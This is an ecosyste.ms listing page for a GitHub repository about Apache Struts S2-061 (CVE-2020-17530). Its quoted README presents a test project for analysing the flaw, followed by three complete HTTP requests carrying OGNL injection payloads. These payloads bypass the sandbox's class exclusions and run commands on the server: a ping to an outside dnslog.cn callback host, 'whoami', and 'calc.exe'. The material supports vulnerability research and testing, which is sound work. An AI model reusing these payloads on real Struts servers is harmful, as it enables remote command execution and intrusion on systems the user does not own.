https://github.com/al1ex/cve-2020-17530

S2-061 CVE-2020-17530
https://github.com/al1ex/cve-2020-17530

cve-2020-17530 s2-061

Last synced: 11 months ago
JSON representation

S2-061 CVE-2020-17530

Host: GitHub
URL: https://github.com/al1ex/cve-2020-17530
Owner: Al1ex
Created: 2020-12-13T11:02:15.000Z (over 5 years ago)
Default Branch: main
Last Pushed: 2020-12-22T15:27:51.000Z (over 5 years ago)
Last Synced: 2025-04-11T08:28:42.567Z (about 1 year ago)
Topics: cve-2020-17530, s2-061
Language: Java
Homepage:
Size: 559 KB
Stars: 29
Watchers: 1
Forks: 8
Open Issues: 0
Metadata Files:
- Readme: README.md

Awesome Lists containing this project

README

          ## What's this

This is a Simple test Project for S2-061 which can be used to analysis the detail of this vulnerability.

## How to use 

Step 1:Use IDEA  import this project

Step 2:setup tomcat Server

Step 3:Use browser access "http://192.168.174.149:8080/SimpleStruts_war_exploded/S2061.action?id=%25%7b8%2a8%7d"

![simpletst](image/simpletst.png)

### How to Exploit

##### SSRF Test

~~~

POST /SimpleStruts_war_exploded/S2061.action HTTP/1.1

Host: 192.168.174.149:8080

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Cookie: JSESSIONID=0DD7F8E6B11D062C574037318DC36C2D

Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF

Content-Length: 846

------WebKitFormBoundaryl7d1B1aGsV2wcZwF

Content-Disposition: form-data; name="id"

%{(#instancemanager=#application["org.apache.tomcat.InstanceManager"]).(#stack=#attr["com.opensymphony.xwork2.util.ValueStack.ValueStack"]).(#bean=#instancemanager.newInstance("org.apache.commons.collections.BeanMap")).(#bean.setBean(#stack)).(#context=#bean.get("context")).(#bean.setBean(#context)).(#macc=#bean.get("memberAccess")).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance("java.util.HashSet")).(#bean.put("excludedClasses",#emptyset)).(#bean.put("excludedPackageNames",#emptyset)).(#arglist=#instancemanager.newInstance("java.util.ArrayList")).(#arglist.add("ping 4ofoqe.dnslog.cn")).(#execute=#instancemanager.newInstance("freemarker.template.utility.Execute")).(#execute.exec(#arglist))}

------WebKitFormBoundaryl7d1B1aGsV2wcZwF--

~~~

![SSRF](image/SSRF.png)

DNSLog：

![DNSLog](image/DNSLog.png)

##### System command

~~~

POST /SimpleStruts_war_exploded/S2061.action HTTP/1.1

Host: 192.168.174.149:8080

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Cookie: JSESSIONID=0DD7F8E6B11D062C574037318DC36C2D

Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF

Content-Length: 831

------WebKitFormBoundaryl7d1B1aGsV2wcZwF

Content-Disposition: form-data; name="id"

%{(#instancemanager=#application["org.apache.tomcat.InstanceManager"]).(#stack=#attr["com.opensymphony.xwork2.util.ValueStack.ValueStack"]).(#bean=#instancemanager.newInstance("org.apache.commons.collections.BeanMap")).(#bean.setBean(#stack)).(#context=#bean.get("context")).(#bean.setBean(#context)).(#macc=#bean.get("memberAccess")).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance("java.util.HashSet")).(#bean.put("excludedClasses",#emptyset)).(#bean.put("excludedPackageNames",#emptyset)).(#arglist=#instancemanager.newInstance("java.util.ArrayList")).(#arglist.add("whoami")).(#execute=#instancemanager.newInstance("freemarker.template.utility.Execute")).(#execute.exec(#arglist))}

------WebKitFormBoundaryl7d1B1aGsV2wcZwF--

~~~

![system_command](image/system_command.png)

##### execute calc

~~~

POST /SimpleStruts_war_exploded/S2061.action HTTP/1.1

Host: 192.168.174.149:8080

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Cookie: JSESSIONID=0DD7F8E6B11D062C574037318DC36C2D

Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF

Content-Length: 833

------WebKitFormBoundaryl7d1B1aGsV2wcZwF

Content-Disposition: form-data; name="id"

%{(#instancemanager=#application["org.apache.tomcat.InstanceManager"]).(#stack=#attr["com.opensymphony.xwork2.util.ValueStack.ValueStack"]).(#bean=#instancemanager.newInstance("org.apache.commons.collections.BeanMap")).(#bean.setBean(#stack)).(#context=#bean.get("context")).(#bean.setBean(#context)).(#macc=#bean.get("memberAccess")).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance("java.util.HashSet")).(#bean.put("excludedClasses",#emptyset)).(#bean.put("excludedPackageNames",#emptyset)).(#arglist=#instancemanager.newInstance("java.util.ArrayList")).(#arglist.add("calc.exe")).(#execute=#instancemanager.newInstance("freemarker.template.utility.Execute")).(#execute.exec(#arglist))}

------WebKitFormBoundaryl7d1B1aGsV2wcZwF--

~~~

![calc_1](image/calc_1.png)

result:![calc_2](image/calc_2.jpg)

ecosyste.ms

Data

Tools

Indexes

Applications

Experiments

Awesome

https://github.com/al1ex/cve-2020-17530

Awesome Lists containing this project

README